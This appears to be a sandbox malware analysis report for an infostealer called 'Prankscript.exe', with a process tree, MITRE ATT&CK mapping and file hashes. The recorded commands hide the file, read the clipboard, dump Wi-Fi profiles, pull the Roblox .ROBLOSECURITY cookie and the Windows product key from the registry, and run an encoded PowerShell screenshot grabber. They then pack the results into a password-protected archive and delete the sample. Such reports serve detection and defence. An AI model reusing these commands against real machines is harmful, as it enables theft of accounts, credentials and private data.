        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
        7⤵
        
        PID:5316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
        7⤵
        
        PID:5540
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
        7⤵
        
        PID:3100
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
        7⤵
        
        PID:6052
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,11515596536618259,17023760854056531009,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
        7⤵
        
        PID:6060
      - C:\Windows\System32\notepad.exe
        
        "C:\Windows\System32\notepad.exe"
        6⤵
        
        PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3096
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
      4⤵
      Views/modifies file attributes
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4932
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:896
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4524
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5096
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4040
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h3omzdkm\h3omzdkm.cmdline"
        5⤵
        
        PID:1924
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB92E.tmp" "c:\Users\Admin\AppData\Local\Temp\h3omzdkm\CSCDE9A542294842EFB77A3F331A5F614B.TMP"
        6⤵
        
        PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2288
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1408
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5028
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4976
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4888
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49842\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\KP9ov.zip" *"
    3⤵
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\_MEI49842\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI49842\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\KP9ov.zip" *
      4⤵
      Executes dropped EXE
      PID:676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3488
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4160

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 76fe6f0341d410041bf644af044373f6 EuWgQSYeI0SQXkRCIXnhgA.0.1.0.0.0
1⤵
PID:644

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x39c 0x3a4
1⤵
PID:1404

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4640

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8740e7db6a0d290c198447b1f16d5281

SHA1
ab54460bb918f4af8a651317c8b53a8f6bfb70cd

SHA256
f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

SHA512
d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ba6ef346187b40694d493da98d5da979

SHA1
643c15bec043f8673943885199bb06cd1652ee37

SHA256
d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

SHA512
2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b8880802fc2bb880a7a869faa01315b0

SHA1
51d1a3fa2c272f094515675d82150bfce08ee8d3

SHA256
467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

SHA512
e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
528B

MD5
115d3aa29d437e9823dbdc7026dfe660

SHA1
a649bddc32e17be17b66d9e52031f8aca10d5c23

SHA256
055ee37ca68b1f8a19d0dbc25d3ba11720dc22eebc7d54e42f0140126ccb216c

SHA512
04908d7c352f2f8660fdfb1a345a9375b80c766db63b6d418dc9e9e59b4b70aef40db9b3d3bc675d6b00763df36045afbbe5ae1988cf3604745552331aa35b4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
62bcd94f71b3154bb88200410dfe91c1

SHA1
90557c1eb47f5bbe6c5aedee903548626d997235

SHA256
7f93927bdb4d58919ac844f5923255c2e0dd7fea9e3462b59b27d16053ccb97a

SHA512
9d1731f880d04c512ad145e4b0e62edddc5fd4ebcfb7978bc2212dcada95c574d9d55c8e4b580e520a2b33f59b6f3047b40a95aeec482a3ecf8d9ff6ebeefedb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9f86597de13fbdc73a9267faefc2937e

SHA1
07b8095f788c7955606a3c9c5ff81180d453c03f

SHA256
5bf341eb7864bf68c5f03613dc99ce7cfad993c6929a9bda6967aa7a2781d944

SHA512
